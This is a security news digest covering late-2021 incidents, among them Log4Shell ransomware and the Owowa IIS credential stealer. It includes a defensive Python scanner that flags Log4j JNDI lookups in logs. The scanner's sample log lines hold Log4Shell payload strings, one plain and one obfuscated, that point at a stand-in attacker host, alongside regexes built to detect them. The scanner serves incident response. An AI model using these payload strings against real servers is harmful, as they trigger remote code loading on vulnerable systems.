AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

InfoSec News Nuggets 12/15/2021

Billion-dollar natural gas supplier Superior Plus hit with ransomware

Major natural gas supplier Superior Plus announced on Tuesday that it is suffering from a ransomware attack. The billion-dollar propane seller said the incident started on December 12 but did not answer questions about which ransomware group was behind the attack or which systems were affected. “Superior has temporarily disabled certain computer systems and applications as it investigates this incident and is in the process of bringing these systems back online,” the company said, adding that it “took steps to secure its systems and mitigate the impact to the Corporation’s data and operations.” The company said it is still figuring out the scope of the impact on its operations and asked customers for “patience” as it responds to the attack. According to the company’s statement, a cybersecurity company was hired to help deal with the attack.

Cybersecurity incident prevents Maryland Health Department from publishing Covid-19 case data

The Maryland Health Department has not published data on coronavirus case rates for nine days as it recovers from a “network security incident,” the department said Tuesday. The department is focused on “gaining full visibility into the affected network infrastructure” and working to bring affected IT systems back online following the hack, department spokesperson Andy Owen told CNN in an email. In the meantime, data on vaccinations and hospitalizations, among other information related to the virus, is still being published, Owen said. “Our remaining data reports will be updated at the earliest opportunity.” Owen declined to answer questions about the cause of the hacking incident or when the department expects to be fully back online.

New ransomware now being deployed in Log4Shell attacks

The first public case of the Log4j Log4Shell vulnerability used to download and install ransomware has been discovered by researchers. Last Friday, a public exploit was released for a critical zero-day vulnerability named ‘Log4Shell’ in the Apache Log4j Java-based logging platform. Log4j is a development framework that allows developers to add error and event logging into their Java applications. The vulnerability allows threat actors to create special JNDI strings that, when read by Log4j, cause the platform to connect to and execute code at the included URL. This allows attackers to easily detect vulnerable devices or execute code supplied by a remote site or via Base64 encoded strings.
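The JNDI lookup strings described above are the primary artifact defenders hunt for in web server and application logs. The following Python scanner is an added example written for this digest, not code from the article or from the Apache Log4j project: it runs over a handful of constructed log lines (the `attacker.example` host is a placeholder), collapses the nested `${lower:...}`, `${upper:...}` and `${...:-x}` lookups that are commonly used to hide the literal `jndi` token, and then reports any line that still contains a `${jndi:` lookup together with the scheme and host it would have contacted, which is what an incident responder needs for egress blocking and triage.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample lines in Apache combined-log format (not taken from the article).
# Line 2 carries a plain lookup in the User-Agent, line 3 an obfuscated one in the
# query string, lines 1 and 4 are benign (line 4 has a harmless "${value}" token).
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:23 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:24 +0000] "GET /?x=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.7 - - [13/Dec/2021:10:01:25 +0000] "GET /price?amount=${value} HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
]

# The lookup we ultimately want to find, after de-obfuscation.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Scheme and host of the lookup target, e.g. ("ldap", "attacker.example").
TARGET_PATTERN = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}:\s]+)", re.IGNORECASE)
# Innermost case-changing lookups: ${lower:J} -> j, ${upper:n} -> N.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Innermost default-value lookups: ${env:UNSET:-j} or ${::-j} -> j.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested obfuscating lookups, innermost first, until nothing changes.

    The round limit bounds work on adversarial input that nests very deeply.
    """
    for _ in range(max_rounds):
        new = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def extract_targets(normalized: str) -> List[Tuple[str, str]]:
    """Return (scheme, host) pairs for every JNDI lookup in an already normalized line."""
    return [(m.group(1).lower(), m.group(2)) for m in TARGET_PATTERN.finditer(normalized)]


@dataclass
class Finding:
    line_no: int          # 1-based index into the scanned input
    original: str         # the raw log line as received
    normalized: str       # the line after de-obfuscation, for analyst review
    targets: List[Tuple[str, str]]


def scan(lines: List[str]) -> List[Finding]:
    """Flag every line that contains a JNDI lookup once obfuscation is removed."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        norm = normalize(line)
        if JNDI_PATTERN.search(norm):
            findings.append(Finding(line_no, line, norm, extract_targets(norm)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: targets={f.targets}")
        print(f"  normalized: {f.normalized}")
```

Running the block prints lines 2 and 3 as hits, each with its scheme and host; the benign `${value}` on line 4 is not reported because it is neither a JNDI lookup nor one of the wrapping lookups the normalizer understands. In practice the same `scan` function is pointed at exported access logs, proxy logs and any field an application echoes into its own logging, since the lookup is triggered wherever the string is logged, not only in HTTP headers.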

Hackers steal Microsoft Exchange credentials using IIS module

Threat actors are installing a malicious IIS web server module named ‘Owowa’ on Microsoft Exchange Outlook Web Access servers to steal credentials and execute commands on the server remotely. The development of Owowa likely started in late 2020, based on compilation data and on when it was uploaded to the VirusTotal malware scanning service. Based on Kaspersky’s telemetry data, the most recent sample in circulation is from April 2021, targeting servers in Malaysia, Mongolia, Indonesia, and the Philippines. These systems belong to government organizations, public transportation companies, and other crucial entities. Kaspersky underlines that the ‘Owowa’ targets aren’t limited to Southeast Asia, and they have also seen signs of infections in Europe.

The EFF will fight Google Chrome Manifest v3 which kills extensions that reliably block ads

Google Chrome will gradually undergo a fundamental revision, and it will deeply impact all extensions for the web browser. The upcoming revised set of Application Programming Interfaces (APIs), collectively known as Manifest v3, will essentially kill all popular ad-blocking extensions. The Electronic Frontier Foundation (EFF) has vowed to fight this change, but it could be a losing battle. The EFF has promised to take on Google and attempt to convince the tech giant to rethink Chrome Manifest v3. Essentially, the consortium is trying to repeal the detrimental set of APIs, which primarily seek to decimate some specific and popular extensions for the Chrome web browser. EFF technologists Alexei Miagkov and Bennett Cyphers have reportedly called out Google for deliberately hampering ad-blocking extensions under the guise of development. “According to Google, Manifest v3 will improve privacy, security, and performance. We fundamentally disagree. The changes in Manifest v3 won’t stop malicious extensions, but will hurt innovation, reduce extension capabilities, and harm real-world performance,” stated Miagkov.

Bugs in billions of WiFi, Bluetooth chips allow password, data theft

Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component. Modern consumer electronic devices such as smartphones feature SoCs with separate Bluetooth, WiFi, and LTE components, each with its own dedicated security implementation. However, these components often share the same resources, such as the antenna or wireless spectrum. This resource sharing aims to make the SoCs more energy-efficient and give them higher throughput and lower latency in communications. As the researchers detail in the recently published paper, it is possible to use these shared resources as bridges for launching lateral privilege escalation attacks across wireless chip boundaries.
